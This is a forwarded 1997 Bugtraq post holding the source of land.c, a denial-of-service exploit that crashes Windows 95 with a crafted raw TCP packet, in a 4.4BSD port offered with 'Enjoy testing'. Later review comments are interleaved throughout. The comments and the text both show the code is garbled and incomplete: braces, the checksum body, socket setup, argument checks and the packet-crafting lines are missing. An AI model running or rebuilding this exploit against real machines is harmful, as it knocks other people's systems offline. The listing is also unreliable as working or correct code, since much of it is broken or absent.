new TCP/IP bug in win95 (fwd)

Here's the source posted on Bugtraq yesterday.

Here's the source posted on Bugtraq yesterday.

Date: Thu, 20 Nov 1997 19:40:19 -0500
From: m3lt <meltman@LAGGED.NET>
Subject: new TCP/IP bug in win95

[ . . . deletia . . . ]

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box */

[ deleted LINUX code ]

With the help of my co-worker Jeremy Cooper, a large amount of
Starbucks coffee, and a glazed buttermilk bar, I ported this 'sploit
code to 44BSD flavors (should compile fine on FreeBSD, BSDI or NetBSD).

Enjoy testing,
   \ Tim Keanini | "The limits of my language, /
   / | are the limits of my world." \
   \ | --Ludwig Wittgenstein /
   \ +================================================/
   >Key fingerprint = 7B 68 88 41 A8 74 AB EC F0 37 98 4C 37 F7 40 D6 |
   / PUB KEY: \

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box
   Ported to 44BSD by blast and jerm */

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

/* TCP pseudo-header followed by a copy of the TCP header, so that both can be
   checksummed as one contiguous buffer.  main() passes this struct to
   checksum() with a length of 12 + sizeof(struct tcphdr): the first five
   members add up to those 12 bytes (4 + 4 + 1 + 1 + 2).
   NOTE(review): the braces and the closing ';' of the definition are missing
   from this copy of the listing; the member list is shown as posted. */
struct pseudohdr
        struct in_addr saddr;           /* source address, 4 bytes */
        struct in_addr daddr;           /* destination address, 4 bytes */
        u_char zero;                    /* always 0 in the pseudo-header */
        u_char protocol;                /* IP protocol number of the payload */
        u_short length;                 /* TCP segment length, network byte order (see main) */
        struct tcphdr tcpheader;        /* the header being checksummed, copied in by main() */

/* Computes the checksum that main() stores in tcpheader->th_sum over `length`
   bytes starting at `data`.
   NOTE(review): only the signature and two local declarations survive in this
   copy; the body is missing, so the exact algorithm cannot be confirmed from
   here.  `register` is a hint the compiler ignores and can be dropped. */
u_short checksum(u_short * data,u_short length)
        register long value;            /* running sum; wider than u_short so carries are kept */
        u_short i;                      /* loop index over the 16-bit words of `data` */





/* Entry point: builds one raw IP+TCP packet on the stack and sends it to the
   host and port named on the command line.
   NOTE(review): this copy of the listing is not compilable as shown -- the
   braces, the argument-count check that guards the usage message, the `if`
   that precedes the `else if` below, the port parsing, the raw-socket
   creation and the setsockopt() call that the remaining error messages belong
   to are all missing.  Only what is visible is described here. */
int main(int argc,char * * argv)
        struct sockaddr_in sin;
        struct hostent * hoste;         /* declared here; its use is not in this copy */
        int sock,foo;
        /* 40 bytes is written by hand; it has to equal
           sizeof(struct ip)+sizeof(struct tcphdr) (20+20 with no options) --
           a named constant would keep the two from drifting apart. */
        char buffer[40];
        /* IP header and TCP header are overlaid on `buffer` back to back */
        struct ip * ipheader=(struct ip *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt mod by blast, FLC\n");

                /* usage message; the argc check guarding it is missing from this copy */
                fprintf(stderr,"usage: %s IP port\n",argv[0]);

        bzero(&sin,sizeof(struct sockaddr_in));

        /* inet_addr() returns in_addr_t, which is unsigned; comparing with -1
           relies on the implicit conversion -- INADDR_NONE is the portable
           spelling.  The `if` branch this `else if` belongs to is missing here. */
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
                fprintf(stderr,"unknown host %s\n",argv[1]);

                /* port parsing and its error check are missing from this copy */
                fprintf(stderr,"unknown port %s\n",argv[2]);

                /* raw-socket creation (socket()) is missing from this copy */
                fprintf(stderr,"couldn't allocate raw socket\n");

    /* the setsockopt() call this message belongs to is missing from this copy */
    fprintf(stderr,"couldn't set raw header on socket\n");

        /* &buffer is a pointer to the whole array -- same address as `buffer`,
           different type; only the first 40 bytes (both headers) are cleared */
        bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
        ipheader->ip_hl=sizeof(struct ip)/4;    /* header length in 32-bit words */
        /* total length left in host byte order; 4.4BSD raw sockets expect
           that for ip_len (Linux expects network order) -- presumably one of
           the changes made in this port, verify against the original */
        ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);

        tcpheader->th_off=sizeof(struct tcphdr)/4;      /* data offset in 32-bit words */

        /* Checksum: zero the 12-byte pseudo-header plus the TCP header copy,
           record the TCP length in network order, copy the header in, and
           sum the whole thing.  In the visible lines the pseudo-header's
           address and protocol fields are never assigned, so they stay 0 here. */
        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        /* send the 40-byte packet as-is on the raw socket; on failure errno is
           printed as a bare number -- strerror(errno) would be more readable */
        if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
                fprintf(stderr,"couldn't send packet,%d\n",errno);

        /* reports completion, not delivery -- nothing above observes the target's reaction */
        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);